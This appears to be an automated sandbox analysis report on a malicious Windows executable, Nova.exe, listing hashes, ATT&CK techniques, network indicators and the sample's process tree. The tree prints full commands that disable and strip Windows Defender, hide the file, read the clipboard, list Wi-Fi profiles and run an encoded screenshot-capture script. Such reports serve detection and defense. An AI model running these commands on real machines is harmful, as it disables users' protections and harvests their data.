594bb34f3ca93d8d6c3551f12e106db2c7d4f6af2ab4307fa9f2943838dd7af9

Resubmissions

29-12-2024 17:13

241229-vrtqgavmcx 10

29-12-2024 01:44

241229-b5zdbsylhp 10

Analysis

max time kernel
0s
max time network
10s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
29-12-2024 17:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nova.exe
Size

7.7MB
MD5

af6415de69e4e824d6213d1bf4ba329c
SHA1

d3b58e8472f7fd9d690f689346b5ec6b06a8ce39
SHA256

594bb34f3ca93d8d6c3551f12e106db2c7d4f6af2ab4307fa9f2943838dd7af9
SHA512

70eb82a6712e8264b514447db048336dd379190f0e934f8ba96d456526250c16a1e9493adaf580aaf2ef7d4ff52be9530be5835b5b9f5bb54afb9227a3913f45
SSDEEP

196608:DeD+kdpwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWi:i5QIHL7HmBYXrYoaUNR

Score

10^/10

collection defense_evasion discovery evasion execution upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
2524	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
664	powershell.exe
2288	powershell.exe
2592	powershell.exe
2176	powershell.exe
4116	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1756	powershell.exe
4156	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1124	tasklist.exe
4792	tasklist.exe
4388	tasklist.exe
1684	tasklist.exe
3612	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5056	cmd.exe

UPX packed file 63 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0026000000046248-21.dat	upx
behavioral1/memory/2336-25-0x00007FF901D60000-0x00007FF9023C5000-memory.dmp	upx
behavioral1/files/0x0026000000046248-22.dat	upx
behavioral1/files/0x00280000000461fd-39.dat	upx
behavioral1/files/0x002800000004621b-46.dat	upx
behavioral1/memory/2336-48-0x00007FF917480000-0x00007FF91748F000-memory.dmp	upx
behavioral1/memory/2336-47-0x00007FF9116B0000-0x00007FF9116D7000-memory.dmp	upx
behavioral1/files/0x002800000004621a-45.dat	upx
behavioral1/files/0x0028000000046219-44.dat	upx
behavioral1/files/0x0028000000046218-43.dat	upx
behavioral1/files/0x0028000000046217-42.dat	upx
behavioral1/files/0x0028000000046211-41.dat	upx
behavioral1/files/0x00280000000461ff-40.dat	upx
behavioral1/files/0x002900000004624d-38.dat	upx
behavioral1/files/0x002900000004624c-37.dat	upx
behavioral1/files/0x002600000004624b-36.dat	upx
behavioral1/memory/2336-60-0x00007FF910E40000-0x00007FF910FBF000-memory.dmp	upx
behavioral1/memory/2336-62-0x00007FF914E20000-0x00007FF914E39000-memory.dmp	upx
behavioral1/memory/2336-64-0x00007FF917470000-0x00007FF91747D000-memory.dmp	upx
behavioral1/files/0x002600000004623c-67.dat	upx
behavioral1/memory/2336-71-0x00007FF9116B0000-0x00007FF9116D7000-memory.dmp	upx
behavioral1/memory/2336-74-0x00007FF901820000-0x00007FF901D53000-memory.dmp	upx
behavioral1/memory/2336-82-0x00007FF910D80000-0x00007FF910E33000-memory.dmp	upx
behavioral1/memory/2336-81-0x00007FF917390000-0x00007FF9173A9000-memory.dmp	upx
behavioral1/memory/2336-79-0x00007FF915260000-0x00007FF91526D000-memory.dmp	upx
behavioral1/memory/2336-106-0x00007FF911860000-0x00007FF911885000-memory.dmp	upx
behavioral1/memory/2336-125-0x00007FF910E40000-0x00007FF910FBF000-memory.dmp	upx
behavioral1/memory/2336-307-0x00007FF911820000-0x00007FF911853000-memory.dmp	upx
behavioral1/memory/2336-348-0x00007FF901820000-0x00007FF901D53000-memory.dmp	upx
behavioral1/memory/2336-324-0x00007FF9110E0000-0x00007FF9111AE000-memory.dmp	upx
behavioral1/memory/2336-228-0x00007FF914E20000-0x00007FF914E39000-memory.dmp	upx
behavioral1/memory/2336-349-0x00007FF911800000-0x00007FF911814000-memory.dmp	upx
behavioral1/memory/2336-350-0x00007FF901D60000-0x00007FF9023C5000-memory.dmp	upx
behavioral1/memory/2336-356-0x00007FF910E40000-0x00007FF910FBF000-memory.dmp	upx
behavioral1/memory/2336-364-0x00007FF910D80000-0x00007FF910E33000-memory.dmp	upx
behavioral1/memory/2336-78-0x00007FF911890000-0x00007FF9118BB000-memory.dmp	upx
behavioral1/memory/2336-76-0x00007FF911800000-0x00007FF911814000-memory.dmp	upx
behavioral1/memory/2336-72-0x00007FF9110E0000-0x00007FF9111AE000-memory.dmp	upx
behavioral1/memory/2336-70-0x00007FF901D60000-0x00007FF9023C5000-memory.dmp	upx
behavioral1/files/0x0034000000046232-69.dat	upx
behavioral1/files/0x0034000000046232-68.dat	upx
behavioral1/memory/2336-66-0x00007FF911820000-0x00007FF911853000-memory.dmp	upx
behavioral1/memory/2336-58-0x00007FF911860000-0x00007FF911885000-memory.dmp	upx
behavioral1/memory/2336-56-0x00007FF917390000-0x00007FF9173A9000-memory.dmp	upx
behavioral1/memory/2336-54-0x00007FF911890000-0x00007FF9118BB000-memory.dmp	upx
behavioral1/files/0x0034000000046232-32.dat	upx
behavioral1/files/0x0026000000046238-30.dat	upx
behavioral1/files/0x00280000000461fe-28.dat	upx
behavioral1/memory/2336-375-0x00007FF9110E0000-0x00007FF9111AE000-memory.dmp	upx
behavioral1/memory/2336-380-0x00007FF901820000-0x00007FF901D53000-memory.dmp	upx
behavioral1/memory/2336-378-0x00007FF915260000-0x00007FF91526D000-memory.dmp	upx
behavioral1/memory/2336-379-0x00007FF910D80000-0x00007FF910E33000-memory.dmp	upx
behavioral1/memory/2336-374-0x00007FF911820000-0x00007FF911853000-memory.dmp	upx
behavioral1/memory/2336-373-0x00007FF917470000-0x00007FF91747D000-memory.dmp	upx
behavioral1/memory/2336-372-0x00007FF914E20000-0x00007FF914E39000-memory.dmp	upx
behavioral1/memory/2336-371-0x00007FF910E40000-0x00007FF910FBF000-memory.dmp	upx
behavioral1/memory/2336-370-0x00007FF911860000-0x00007FF911885000-memory.dmp	upx
behavioral1/memory/2336-369-0x00007FF917390000-0x00007FF9173A9000-memory.dmp	upx
behavioral1/memory/2336-368-0x00007FF911890000-0x00007FF9118BB000-memory.dmp	upx
behavioral1/memory/2336-367-0x00007FF917480000-0x00007FF91748F000-memory.dmp	upx
behavioral1/memory/2336-366-0x00007FF9116B0000-0x00007FF9116D7000-memory.dmp	upx
behavioral1/memory/2336-365-0x00007FF901D60000-0x00007FF9023C5000-memory.dmp	upx
behavioral1/memory/2336-377-0x00007FF911800000-0x00007FF911814000-memory.dmp	upx

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3848	PING.EXE
884	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3308	netsh.exe
3556	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2932	WMIC.exe
3316	WMIC.exe
4148	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1256	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3848	PING.EXE

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1972	attrib.exe
2148	attrib.exe
2304	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Nova.exe
"C:\Users\Admin\AppData\Local\Temp\Nova.exe"
1⤵
PID:4404
- C:\Users\Admin\AppData\Local\Temp\Nova.exe
  "C:\Users\Admin\AppData\Local\Temp\Nova.exe"
  2⤵
  PID:2336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova.exe'"
    3⤵
    PID:4964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2592
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code 280', 0, 'Version Outdated', 0+16);close()""
    3⤵
    PID:4316
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code 280', 0, 'Version Outdated', 0+16);close()"
      4⤵
      PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3284
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:1144
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:1708
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nova.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:5056
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nova.exe"
      4⤵
      Views/modifies file attributes
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍ .scr'"
    3⤵
    PID:4392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2948
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3588
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:320
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4260
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2820
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3556
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4140
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2432
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:2964
